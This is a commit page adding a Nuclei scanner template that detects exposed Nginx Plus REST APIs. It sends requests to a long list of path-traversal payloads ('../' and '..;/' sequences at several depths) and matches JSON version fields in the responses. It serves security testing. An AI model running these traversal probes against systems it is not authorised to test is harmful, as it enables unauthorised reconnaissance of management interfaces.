Merge pull request #10702 from projectdiscovery/nginx-api-traversal
Create nginx-api-traversal.yamlpatch-11
commit
beaa3be244
|
@ -0,0 +1,109 @@
|
|||
id: nginx-api-traversal
|
||||
|
||||
info:
|
||||
name: Nginx Plus Rest API - Traversal
|
||||
author: encodedguy
|
||||
severity: high
|
||||
description: |
|
||||
Access to Nginx Plus Rest API was discovered.
|
||||
reference:
|
||||
- https://nginx.org/en/docs/http/ngx_http_api_module.html
|
||||
- https://x.com/akshaysharma71/status/1825815869953552844
|
||||
metadata:
|
||||
verified: true
|
||||
tags: nginx,fuzz,misconfig,lfi
|
||||
|
||||
http:
|
||||
- method: GET
|
||||
path:
|
||||
- "{{BaseURL}}{{paths}}"
|
||||
|
||||
payloads:
|
||||
paths:
|
||||
- "/api/1/nginx"
|
||||
- "/api/2/nginx"
|
||||
- "/api/3/nginx"
|
||||
- "/api/5/nginx"
|
||||
- "/api/9/nginx"
|
||||
- "/../../../../../../api/1/nginx"
|
||||
- "/../../../../../../api/2/nginx"
|
||||
- "/../../../../../../api/3/nginx"
|
||||
- "/../../../../../../api/5/nginx"
|
||||
- "/../../../../../../api/9/nginx"
|
||||
- "/../../../../../api/1/nginx"
|
||||
- "/../../../../../api/2/nginx"
|
||||
- "/../../../../../api/3/nginx"
|
||||
- "/../../../../../api/5/nginx"
|
||||
- "/../../../../../api/9/nginx"
|
||||
- "/../../../../api/1/nginx"
|
||||
- "/../../../../api/2/nginx"
|
||||
- "/../../../../api/3/nginx"
|
||||
- "/../../../../api/5/nginx"
|
||||
- "/../../../../api/9/nginx"
|
||||
- "/../../../api/1/nginx"
|
||||
- "/../../../api/2/nginx"
|
||||
- "/../../../api/3/nginx"
|
||||
- "/../../../api/5/nginx"
|
||||
- "/../../../api/9/nginx"
|
||||
- "/../../api/1/nginx"
|
||||
- "/../../api/2/nginx"
|
||||
- "/../../api/3/nginx"
|
||||
- "/../../api/5/nginx"
|
||||
- "/../../api/9/nginx"
|
||||
- "/../api/1/nginx"
|
||||
- "/../api/2/nginx"
|
||||
- "/../api/3/nginx"
|
||||
- "/../api/5/nginx"
|
||||
- "/../api/9/nginx"
|
||||
- "/..;/..;/..;/..;/..;/..;/api/1/nginx"
|
||||
- "/..;/..;/..;/..;/..;/..;/api/2/nginx"
|
||||
- "/..;/..;/..;/..;/..;/..;/api/3/nginx"
|
||||
- "/..;/..;/..;/..;/..;/..;/api/5/nginx"
|
||||
- "/..;/..;/..;/..;/..;/..;/api/9/nginx"
|
||||
- "/..;/..;/..;/..;/..;/api/1/nginx"
|
||||
- "/..;/..;/..;/..;/..;/api/2/nginx"
|
||||
- "/..;/..;/..;/..;/..;/api/3/nginx"
|
||||
- "/..;/..;/..;/..;/..;/api/5/nginx"
|
||||
- "/..;/..;/..;/..;/..;/api/9/nginx"
|
||||
- "/..;/..;/..;/..;/api/1/nginx"
|
||||
- "/..;/..;/..;/..;/api/2/nginx"
|
||||
- "/..;/..;/..;/..;/api/3/nginx"
|
||||
- "/..;/..;/..;/..;/api/5/nginx"
|
||||
- "/..;/..;/..;/..;/api/9/nginx"
|
||||
- "/..;/..;/..;/api/1/nginx"
|
||||
- "/..;/..;/..;/api/2/nginx"
|
||||
- "/..;/..;/..;/api/3/nginx"
|
||||
- "/..;/..;/..;/api/5/nginx"
|
||||
- "/..;/..;/..;/api/9/nginx"
|
||||
- "/..;/..;/api/1/nginx"
|
||||
- "/..;/..;/api/2/nginx"
|
||||
- "/..;/..;/api/3/nginx"
|
||||
- "/..;/..;/api/5/nginx"
|
||||
- "/..;/..;/api/9/nginx"
|
||||
- "/..;/api/1/nginx"
|
||||
- "/..;/api/2/nginx"
|
||||
- "/..;/api/3/nginx"
|
||||
- "/..;/api/5/nginx"
|
||||
- "/..;/api/9/nginx"
|
||||
|
||||
stop-at-first-match: true
|
||||
|
||||
matchers-condition: and
|
||||
matchers:
|
||||
- type: word
|
||||
part: body
|
||||
words:
|
||||
- "version"
|
||||
- "build"
|
||||
- "address"
|
||||
- "load_timestamp"
|
||||
condition: and
|
||||
|
||||
- type: word
|
||||
part: content_type
|
||||
words:
|
||||
- application/json
|
||||
|
||||
- type: status
|
||||
status:
|
||||
- 200
|
Loading…
Reference in New Issue